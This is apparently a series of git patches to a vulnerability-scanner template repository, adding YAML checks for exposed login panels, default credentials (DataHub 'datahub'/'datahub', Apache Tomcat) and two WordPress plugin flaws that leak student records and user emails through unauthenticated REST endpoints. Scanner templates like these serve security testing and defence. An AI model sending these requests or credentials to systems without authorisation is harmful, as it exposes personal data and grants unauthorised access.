+++ b/exposed-panels/lancom-router-panel.yaml @@ -4,6 +4,9 @@ info: name: Lancom Router Panel author: __Fazal,daffainfo severity: info + metadata: + verified: "true" + shodan-query: html:"LANCOM Systems GmbH" tags: panel,lancom,router requests: @@ -13,13 +16,13 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - 'alt="LANCOM Systems GmbH"' - 'class="outside_device_string_common">LANCOM' condition: and + + - type: status + status: + - 200 From 0d9e12b254e9fdfa7c9addc50c34d0b623704874 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Wed, 9 Nov 2022 19:48:37 +0530 Subject: [PATCH 0073/1415] Added template for CVE-2022-2379 --- cves/2022/CVE-2022-2379.yaml | 48 ++++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 cves/2022/CVE-2022-2379.yaml diff --git a/cves/2022/CVE-2022-2379.yaml b/cves/2022/CVE-2022-2379.yaml new file mode 100644 index 0000000000..b6f3c4a9b4 --- /dev/null +++ b/cves/2022/CVE-2022-2379.yaml @@ -0,0 +1,48 @@ +id: CVE-2022-2379 + +info: + name: Easy Student Results <= 2.2.8 - Sensitive Information Disclosure via REST API + author: theamanrawat + severity: high + description: | + The Easy Student Results WordPress plugin through 2.2.8 lacks authorisation in its REST API, allowing unauthenticated users to retrieve information related to the courses, exams, departments as well as student's grades and PII such as email address, physical address, phone number etc. + reference: + - https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6 + - https://wordpress.org/plugins/easy-student-results/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-2379 + tags: cve,cve2022,information-disclosure,wpscan,wordpress,wp-plugin,wp,easy-student-results,unauth + +requests: + - raw: + - | + GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: word + part: body + words: + - '{"departments":' + - 'batches":' + condition: and + + - type: word + part: body_2 + words: + - 'meta_data' + - '"email":"' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 \ No newline at end of file From ba9e9e3a0e9fd321bcf43293e6760852c7281187 Mon Sep 17 00:00:00 2001 From: sinKettu Date: Wed, 9 Nov 2022 17:19:52 +0300 Subject: [PATCH 0074/1415] Tomcat Manager: detection and bf templates fixes for newver versions --- default-logins/apache/tomcat-default-login.yaml | 3 +-- exposed-panels/apache/public-tomcat-manager.yaml | 6 ++++-- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml index 96a98e2ffa..6479253691 100644 --- a/default-logins/apache/tomcat-default-login.yaml +++ b/default-logins/apache/tomcat-default-login.yaml @@ -2,7 +2,7 @@ id: tomcat-default-login info: name: Apache Tomcat Manager Default Login - author: pdteam + author: pdteam,sinKettu severity: high description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. reference: @@ -68,7 +68,6 @@ requests: words: - "Apache Tomcat" - "Server Information" - - "Hostname" condition: and - type: status diff --git a/exposed-panels/apache/public-tomcat-manager.yaml b/exposed-panels/apache/public-tomcat-manager.yaml index ee96281c8b..f501c20539 100644 --- a/exposed-panels/apache/public-tomcat-manager.yaml +++ b/exposed-panels/apache/public-tomcat-manager.yaml @@ -2,7 +2,7 @@ id: public-tomcat-manager info: name: Apache Tomcat Manager Disclosure - author: Ahmed Sherif,geeknik + author: Ahmed Sherif,geeknik,sinKettu severity: info description: An Apache Tomcat Manager panel was discovered. classification: @@ -17,7 +17,9 @@ requests: - '{{BaseURL}}/manager/html' - '{{BaseURL}}/host-manager/html' - matchers-condition: and + # Not all the versions print 'Apache Tomcat' on 401th page --> condition is 'or' + # Tested on Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 + matchers-condition: or matchers: - type: word words: From 7e2236146ba07b93606910636baddb3ab674b86f Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Wed, 9 Nov 2022 20:13:06 +0530 Subject: [PATCH 0075/1415] Added template for CVE-2022-2373 --- cves/2022/CVE-2022-2373.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2022/CVE-2022-2373.yaml diff --git a/cves/2022/CVE-2022-2373.yaml b/cves/2022/CVE-2022-2373.yaml new file mode 100644 index 0000000000..dc890c9f78 --- /dev/null +++ b/cves/2022/CVE-2022-2373.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-2373 + +info: + name: Simply Schedule Appointments < 1.5.7.7 - Unauthenticated Email Address Disclosure + author: theamanrawat, abhinav, shivam + severity: medium + description: | + The Simply Schedule Appointments WordPress plugin before 1.5.7.7 is missing authorisation in a REST endpoint, allowing unauthenticated users to retrieve WordPress users details such as name and email address. + reference: + - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31 + - https://wordpress.org/plugins/simply-schedule-appointments/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-2373 + tags: cve,cve2022,information-disclosure,wpscan,wordpress,wp-plugin,wp,simply-schedule-appointments,unauth + +requests: + - raw: + - | + GET /wp-json/ssa/v1/users HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: regex + regex: + - '{"response_code":200,' + - '"email":"([a-zA-Z-_0-9@.]+)","display_name":"([a-zA-Z-_0-9@.]+)","gravatar_url":"http?:\\\/\\\/([a-z0-9A-Z.\\\/?=&@_-]+)"' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 \ No newline at end of file From c8250a42e16453d4b66e761997a487d35699cdf9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Nov 2022 23:16:30 +0530 Subject: [PATCH 0076/1415] Create system-properties-exposure.yaml --- .../system-properties-exposure.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/system-properties-exposure.yaml diff --git a/misconfiguration/system-properties-exposure.yaml b/misconfiguration/system-properties-exposure.yaml new file mode 100644 index 0000000000..d2cfa965d1 --- /dev/null +++ b/misconfiguration/system-properties-exposure.yaml @@ -0,0 +1,28 @@ +id: system-properties-exposure + +info: + name: System Properties Exposure + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: title:"System Properties" + tags: misconfig,system,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "System Properties" + - "Environment Variables:" + condition: and + + - type: status + status: + - 200 From 89e2c390a36199c646d5aebc0cb02dc122c764d6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Nov 2022 23:24:22 +0530 Subject: [PATCH 0077/1415] Update CVE-2022-2373.yaml --- cves/2022/CVE-2022-2373.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-2373.yaml b/cves/2022/CVE-2022-2373.yaml index dc890c9f78..99aae3644a 100644 --- a/cves/2022/CVE-2022-2373.yaml +++ b/cves/2022/CVE-2022-2373.yaml @@ -2,7 +2,7 @@ id: CVE-2022-2373 info: name: Simply Schedule Appointments < 1.5.7.7 - Unauthenticated Email Address Disclosure - author: theamanrawat, abhinav, shivam + author: theamanrawat,abhinav,shivam severity: medium description: | The Simply Schedule Appointments WordPress plugin before 1.5.7.7 is missing authorisation in a REST endpoint, allowing unauthenticated users to retrieve WordPress users details such as name and email address. @@ -33,4 +33,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 1c1f244115398e0c705fd71a68ae6f80ce2257de Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Nov 2022 23:34:33 +0530 Subject: [PATCH 0078/1415] Update CVE-2022-2373.yaml --- cves/2022/CVE-2022-2373.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-2373.yaml b/cves/2022/CVE-2022-2373.yaml index 99aae3644a..7190d51ea5 100644 --- a/cves/2022/CVE-2022-2373.yaml +++ b/cves/2022/CVE-2022-2373.yaml @@ -10,7 +10,8 @@ info: - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31 - https://wordpress.org/plugins/simply-schedule-appointments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2373 - tags: cve,cve2022,information-disclosure,wpscan,wordpress,wp-plugin,wp,simply-schedule-appointments,unauth + verified: true + tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,simply-schedule-appointments,unauth requests: - raw: From 7ec6639e290590e41f46772cb8cf4526464fcfdc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Nov 2022 23:37:36 +0530 Subject: [PATCH 0079/1415] Update CVE-2022-2373.yaml --- cves/2022/CVE-2022-2373.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2022/CVE-2022-2373.yaml b/cves/2022/CVE-2022-2373.yaml index 7190d51ea5..36cae207b7 100644 --- a/cves/2022/CVE-2022-2373.yaml +++ b/cves/2022/CVE-2022-2373.yaml @@ -10,6 +10,7 @@ info: - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31 - https://wordpress.org/plugins/simply-schedule-appointments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2373 + metadata: verified: true tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,simply-schedule-appointments,unauth From 625d6e048d3b6571267b9e32837e06d2a3732ac1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Nov 2022 23:48:00 +0530 Subject: [PATCH 0080/1415] Update lansweeper-login.yaml --- exposed-panels/lansweeper-login.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposed-panels/lansweeper-login.yaml b/exposed-panels/lansweeper-login.yaml index 1b754dbf1d..07c55c4edd 100644 --- a/exposed-panels/lansweeper-login.yaml +++ b/exposed-panels/lansweeper-login.yaml @@ -4,6 +4,9 @@ info: name: Lansweeper Login author: divya_mudgal severity: info + metadata: + verified: true + shodan-query: title:"Lansweeper - Login" tags: lansweeper,tech,panel requests: From 1f44df640b449722d9a616c713dd5b592f562363 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 9 Nov 2022 23:57:14 +0530 Subject: [PATCH 0081/1415] Update CVE-2022-2373.yaml --- cves/2022/CVE-2022-2373.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-2373.yaml b/cves/2022/CVE-2022-2373.yaml index 36cae207b7..c4d51bf25b 100644 --- a/cves/2022/CVE-2022-2373.yaml +++ b/cves/2022/CVE-2022-2373.yaml @@ -1,8 +1,8 @@ id: CVE-2022-2373 info: - name: Simply Schedule Appointments < 1.5.7.7 - Unauthenticated Email Address Disclosure - author: theamanrawat,abhinav,shivam + name: Simply Schedule Appointments < 1.5.7.7 - Email Address Disclosure + author: theamanrawat,theabhinavgaur,sechunt3r severity: medium description: | The Simply Schedule Appointments WordPress plugin before 1.5.7.7 is missing authorisation in a REST endpoint, allowing unauthenticated users to retrieve WordPress users details such as name and email address. @@ -12,7 +12,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-2373 metadata: verified: true - tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,simply-schedule-appointments,unauth + tags: cve,cve2022,wordpress,wp-plugin,wp,simply-schedule-appointments,unauth requests: - raw: From 1b5f9d858f636e626deddc028e97e8a63b2e837f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 10 Nov 2022 00:18:46 +0530 Subject: [PATCH 0082/1415] Update CVE-2022-2373.yaml --- cves/2022/CVE-2022-2373.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/cves/2022/CVE-2022-2373.yaml b/cves/2022/CVE-2022-2373.yaml index c4d51bf25b..24c583208a 100644 --- a/cves/2022/CVE-2022-2373.yaml +++ b/cves/2022/CVE-2022-2373.yaml @@ -10,21 +10,22 @@ info: - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31 - https://wordpress.org/plugins/simply-schedule-appointments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2373 + classification: + cve-id: CVE-2022-2373 metadata: verified: true tags: cve,cve2022,wordpress,wp-plugin,wp,simply-schedule-appointments,unauth requests: - - raw: - - | - GET /wp-json/ssa/v1/users HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/wp-json/ssa/v1/users" - req-condition: true + matchers-condition: and matchers: - type: regex regex: - - '{"response_code":200,' + - 'response_code":200' - '"email":"([a-zA-Z-_0-9@.]+)","display_name":"([a-zA-Z-_0-9@.]+)","gravatar_url":"http?:\\\/\\\/([a-z0-9A-Z.\\\/?=&@_-]+)"' condition: and From 4c339feb759337cfe048a6e65dea32c6111f0f6a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 15:27:59 +0000 Subject: [PATCH 0083/1415] Auto Generated New Template Addition List [Thu Nov 10 15:27:59 UTC 2022] :robot: --- .new-additions | 1 - 1 file changed, 1 deletion(-) diff --git a/.new-additions b/.new-additions index ef78756834..b7c59db5df 100644 --- a/.new-additions +++ b/.new-additions @@ -6,7 +6,6 @@ cves/2022/CVE-2022-42746.yaml cves/2022/CVE-2022-42747.yaml cves/2022/CVE-2022-42748.yaml cves/2022/CVE-2022-42749.yaml -default-logins/datahub-metadata-default-login.yaml default-logins/samsung/samsung-printer-default-login.yaml exposed-panels/airnotifier-panel.yaml exposed-panels/deluge-webui-panel.yaml From bb3bb28daa419c7abdf53336d3432fe2afa9f365 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 10 Nov 2022 20:59:37 +0530 Subject: [PATCH 0084/1415] Create datahub-metadata-default-login.yaml --- .../datahub-metadata-default-login.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 default-logins/datahub-metadata-default-login.yaml diff --git a/default-logins/datahub-metadata-default-login.yaml b/default-logins/datahub-metadata-default-login.yaml new file mode 100644 index 0000000000..621e27012b --- /dev/null +++ b/default-logins/datahub-metadata-default-login.yaml @@ -0,0 +1,33 @@ +id: datahub-metadata-default-login + +info: + name: DataHub Metadata Default Login + author: queencitycyber + severity: high + reference: + - https://github.com/datahub-project/datahub/blob/master/docs/rfc/active/access-control/access-control.md + metadata: + verified: true + shodan-query: http.title:"DataHub" + tags: datahub,default-login + +requests: + - raw: + - | + POST /logIn HTTP/2 + Host: {{Hostname}} + Content-Type: application/json + + {"username":"datahub","password":"datahub"} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: actor=urn:li:corpuser:datahub;' + condition: and + + - type: status + status: + - 200 From c33c116472d9336a99496ad9c5c87181bf59802d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 10 Nov 2022 21:01:21 +0530 Subject: [PATCH 0085/1415] Update CVE-2022-2373.yaml --- cves/2022/CVE-2022-2373.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-2373.yaml b/cves/2022/CVE-2022-2373.yaml index 24c583208a..c8a0c50ddb 100644 --- a/cves/2022/CVE-2022-2373.yaml +++ b/cves/2022/CVE-2022-2373.yaml @@ -2,7 +2,7 @@ id: CVE-2022-2373 info: name: Simply Schedule Appointments < 1.5.7.7 - Email Address Disclosure - author: theamanrawat,theabhinavgaur,sechunt3r + author: theamanrawat,theabhinavgaur severity: medium description: | The Simply Schedule Appointments WordPress plugin before 1.5.7.7 is missing authorisation in a REST endpoint, allowing unauthenticated users to retrieve WordPress users details such as name and email address. From 254ed0eadd3c6aadd8219d03244b167b53103ec3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 15:42:51 +0000 Subject: [PATCH 0086/1415] Auto Generated New Template Addition List [Thu Nov 10 15:42:51 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b7c59db5df..f6e0e9ce8e 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ cves/2022/CVE-2022-0785.yaml cves/2022/CVE-2022-0788.yaml cves/2022/CVE-2022-0824.yaml cves/2022/CVE-2022-0867.yaml +cves/2022/CVE-2022-2373.yaml cves/2022/CVE-2022-42746.yaml cves/2022/CVE-2022-42747.yaml cves/2022/CVE-2022-42748.yaml From 47a8587e02fd06aa4cd0830a085477fb0751c6f0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 15:43:00 +0000 Subject: [PATCH 0087/1415] Auto Generated CVE annotations [Thu Nov 10 15:43:00 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index 9d8b0df087..9d1eca4f52 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,9 +12,10 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 + cwe-id: CWE-284 tags: cve,cve2019,oracle,rce,weblogic requests: From 15b3890e65cc9bd80a74a274387d502c51a1042c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 10 Nov 2022 21:55:24 +0530 Subject: [PATCH 0088/1415] Update CVE-2022-2379.yaml --- cves/2022/CVE-2022-2379.yaml | 19 +++++++++++++------ 1 file changed, 13 insertions(+), 6 deletions(-) diff --git a/cves/2022/CVE-2022-2379.yaml b/cves/2022/CVE-2022-2379.yaml index b6f3c4a9b4..333558524f 100644 --- a/cves/2022/CVE-2022-2379.yaml +++ b/cves/2022/CVE-2022-2379.yaml @@ -1,7 +1,7 @@ id: CVE-2022-2379 info: - name: Easy Student Results <= 2.2.8 - Sensitive Information Disclosure via REST API + name: Easy Student Results <= 2.2.8 - Information Disclosure author: theamanrawat severity: high description: | @@ -10,7 +10,11 @@ info: - https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6 - https://wordpress.org/plugins/easy-student-results/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2379 - tags: cve,cve2022,information-disclosure,wpscan,wordpress,wp-plugin,wp,easy-student-results,unauth + classification: + cve-id: CVE-2022-2379 + metadata: + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,easy-student-results,disclosure requests: - raw: @@ -22,12 +26,14 @@ requests: GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1 Host: {{Hostname}} + stop-at-first-match: true req-condition: true + matchers-condition: and matchers: - type: word - part: body + part: body_1 words: - - '{"departments":' + - '"departments":' - 'batches":' condition: and @@ -35,7 +41,8 @@ requests: part: body_2 words: - 'meta_data' - - '"email":"' + - '"name":"' + - '"registration_no":' condition: and - type: word @@ -45,4 +52,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 51fb4189dbf44e342a5f92eef497bdcc344267e0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Nov 2022 22:13:22 +0530 Subject: [PATCH 0089/1415] Update and rename default-logins/jinher-oa-default-login.yaml to default-logins/jinher/jinher-oa-default-login.yaml --- default-logins/{ => jinher}/jinher-oa-default-login.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename default-logins/{ => jinher}/jinher-oa-default-login.yaml (100%) diff --git a/default-logins/jinher-oa-default-login.yaml b/default-logins/jinher/jinher-oa-default-login.yaml similarity index 100% rename from default-logins/jinher-oa-default-login.yaml rename to default-logins/jinher/jinher-oa-default-login.yaml From 5a75057c7b7ec671fd123ed193be839211480b1f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Nov 2022 22:13:44 +0530 Subject: [PATCH 0091/1415] Rename default-logins/octobercms-default-login.yaml to default-logins/octobercms/octobercms-default-login.yaml --- default-logins/{ => octobercms}/octobercms-default-login.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename default-logins/{ => octobercms}/octobercms-default-login.yaml (100%) diff --git a/default-logins/octobercms-default-login.yaml b/default-logins/octobercms/octobercms-default-login.yaml similarity index 100% rename from default-logins/octobercms-default-login.yaml rename to default-logins/octobercms/octobercms-default-login.yaml From 5753a82be0042222b5fec8df4b4c8d6e68d4fd9b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Nov 2022 22:14:03 +0530 Subject: [PATCH 0093/1415] Rename default-logins/prtg-default-login.yaml to default-logins/prtg/prtg-default-login.yaml --- default-logins/{ => prtg}/prtg-default-login.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename default-logins/{ => prtg}/prtg-default-login.yaml (100%) diff --git a/default-logins/prtg-default-login.yaml b/default-logins/prtg/prtg-default-login.yaml similarity index 100% rename from default-logins/prtg-default-login.yaml rename to default-logins/prtg/prtg-default-login.yaml From 53a4c99849229b40e040d4a514d57a3516b05059 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Nov 2022 22:15:16 +0530 Subject: [PATCH 0095/1415] Update and rename default-logins/datahub-metadata-default-login.yaml to default-logins/datahub/datahub-metadata-default-login.yaml --- .../{ => datahub}/datahub-metadata-default-login.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) rename default-logins/{ => datahub}/datahub-metadata-default-login.yaml (80%) diff --git a/default-logins/datahub-metadata-default-login.yaml b/default-logins/datahub/datahub-metadata-default-login.yaml similarity index 80% rename from default-logins/datahub-metadata-default-login.yaml rename to default-logins/datahub/datahub-metadata-default-login.yaml index 621e27012b..ab7ac89e03 100644 --- a/default-logins/datahub-metadata-default-login.yaml +++ b/default-logins/datahub/datahub-metadata-default-login.yaml @@ -18,7 +18,14 @@ requests: Host: {{Hostname}} Content-Type: application/json - {"username":"datahub","password":"datahub"} + {"username":"{{username}}","password":"{{password}}"} + + attack: pitchfork + payloads: + username: + - datahub + password: + - datahub matchers-condition: and matchers: From 8c483a6fb164441a1be68827e6d450f85daaa255 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 16:47:16 +0000 Subject: [PATCH 0096/1415] Auto Generated New Template Addition List [Thu Nov 10 16:47:16 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f6e0e9ce8e..845720f512 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ cves/2022/CVE-2022-42746.yaml cves/2022/CVE-2022-42747.yaml cves/2022/CVE-2022-42748.yaml cves/2022/CVE-2022-42749.yaml +default-logins/datahub/datahub-metadata-default-login.yaml default-logins/samsung/samsung-printer-default-login.yaml exposed-panels/airnotifier-panel.yaml exposed-panels/deluge-webui-panel.yaml From 6ec541a8152a8168bd0aa5311d006ba917c742ee Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 10 Nov 2022 22:19:28 +0530 Subject: [PATCH 0097/1415] Update CVE-2022-26263.yaml --- cves/2022/CVE-2022-26263.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2022/CVE-2022-26263.yaml b/cves/2022/CVE-2022-26263.yaml index 3f1efc4593..f64e5c0f26 100644 --- a/cves/2022/CVE-2022-26263.yaml +++ b/cves/2022/CVE-2022-26263.yaml @@ -27,3 +27,5 @@ headless: - type: word words: - ' Date: Thu, 10 Nov 2022 22:25:13 +0530 Subject: [PATCH 0098/1415] Update public-tomcat-manager.yaml --- exposed-panels/apache/public-tomcat-manager.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/exposed-panels/apache/public-tomcat-manager.yaml b/exposed-panels/apache/public-tomcat-manager.yaml index f501c20539..31a017f478 100644 --- a/exposed-panels/apache/public-tomcat-manager.yaml +++ b/exposed-panels/apache/public-tomcat-manager.yaml @@ -17,9 +17,7 @@ requests: - '{{BaseURL}}/manager/html' - '{{BaseURL}}/host-manager/html' - # Not all the versions print 'Apache Tomcat' on 401th page --> condition is 'or' - # Tested on Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 - matchers-condition: or + matchers-condition: and matchers: - type: word words: From e14cb1288da3f14e9b359d469ff4d0f85411b6af Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Nov 2022 22:25:30 +0530 Subject: [PATCH 0099/1415] Update public-tomcat-manager.yaml --- exposed-panels/apache/public-tomcat-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/apache/public-tomcat-manager.yaml b/exposed-panels/apache/public-tomcat-manager.yaml index 31a017f478..ee96281c8b 100644 --- a/exposed-panels/apache/public-tomcat-manager.yaml +++ b/exposed-panels/apache/public-tomcat-manager.yaml @@ -2,7 +2,7 @@ id: public-tomcat-manager info: name: Apache Tomcat Manager Disclosure - author: Ahmed Sherif,geeknik,sinKettu + author: Ahmed Sherif,geeknik severity: info description: An Apache Tomcat Manager panel was discovered. classification: From 38f6227ab0799bcc9604f5e0125feb167dc8c630 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 16:59:00 +0000 Subject: [PATCH 0100/1415] Auto Generated CVE annotations [Thu Nov 10 16:59:00 UTC 2022] :robot: --- cves/2022/CVE-2022-2373.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-2373.yaml b/cves/2022/CVE-2022-2373.yaml index c8a0c50ddb..7b32cc054a 100644 --- a/cves/2022/CVE-2022-2373.yaml +++ b/cves/2022/CVE-2022-2373.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/simply-schedule-appointments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2373 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 cve-id: CVE-2022-2373 + cwe-id: CWE-862 metadata: - verified: true - tags: cve,cve2022,wordpress,wp-plugin,wp,simply-schedule-appointments,unauth + verified: "true" + tags: simply-schedule-appointments,unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp requests: - method: GET From 4c125d086e1f1d9be3ae7c31a5203c2c84cd26de Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Nov 2022 22:31:24 +0530 Subject: [PATCH 0101/1415] Update CVE-2022-2373.yaml --- cves/2022/CVE-2022-2373.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/cves/2022/CVE-2022-2373.yaml b/cves/2022/CVE-2022-2373.yaml index 7b32cc054a..0a18b266b0 100644 --- a/cves/2022/CVE-2022-2373.yaml +++ b/cves/2022/CVE-2022-2373.yaml @@ -10,11 +10,6 @@ info: - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31 - https://wordpress.org/plugins/simply-schedule-appointments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2373 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-2373 - cwe-id: CWE-862 metadata: verified: "true" tags: simply-schedule-appointments,unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp From 3aa4a79e16f6231889d9cc48d6a14053bc6c3098 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 10 Nov 2022 09:12:12 -0800 Subject: [PATCH 0103/1415] Create ace-admin-dashboard.yaml --- misconfiguration/ace-admin-dashboard.yaml | 33 +++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/ace-admin-dashboard.yaml diff --git a/misconfiguration/ace-admin-dashboard.yaml b/misconfiguration/ace-admin-dashboard.yaml new file mode 100644 index 0000000000..716880e854 --- /dev/null +++ b/misconfiguration/ace-admin-dashboard.yaml @@ -0,0 +1,33 @@ +id: ace-admin-dashboard + +info: + name: Ace Admin Dashboard Exposed + author: tess + severity: medium + metadata: + verified: true + shodan-query: title:"Dashboard - Ace Admin" + tags: misconfig,exposed,ace + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Dashboard - Ace Admin" + - "overview & stats" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From c904a9ff0d8eaf925b5f55c8ab21aaa326b9c65d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 10 Nov 2022 22:45:07 +0530 Subject: [PATCH 0104/1415] Update ace-admin-dashboard.yaml --- misconfiguration/ace-admin-dashboard.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/ace-admin-dashboard.yaml b/misconfiguration/ace-admin-dashboard.yaml index 716880e854..ad86201720 100644 --- 